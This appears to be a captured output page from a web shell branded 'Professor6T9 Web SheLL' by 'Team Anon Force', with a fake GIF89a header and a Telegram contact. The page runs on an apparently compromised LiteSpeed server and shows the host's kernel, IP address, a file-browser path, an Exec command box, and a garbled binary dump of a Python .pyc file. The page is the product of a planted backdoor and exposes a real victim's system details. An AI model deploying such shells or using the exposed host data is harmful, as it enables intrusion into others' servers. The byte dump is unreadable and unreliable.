GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux das102.truehost.cloud 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
LiteSpeed
156.232.88.2
/
lib
/
python3.6
/
site-packages
/
tuned
/
profiles
/
functions
/
__pycache__
[ HOME ]
Exec
Submit
function_regex_search_ternary.cpython-36.pyc
3 �<�e* � @ s* d dl Z ddlmZ G dd� dej�ZdS )� N� )�basec s, e Zd ZdZ� fdd�Z� fdd�Z� ZS )�regex_search_ternaryz� Ternary regex operator, it takes arguments in the following form STR1, REGEX, STR2, STR3 If REGEX matches STR1 (re.search is used), STR2 is returned, otherwise STR3 is returned c s t t| �jddd� d S )Nr � )�superr �__init__)�self)� __class__� �3/usr/lib/python3.6/function_regex_search_ternary.pyr s zregex_search_ternary.__init__c s<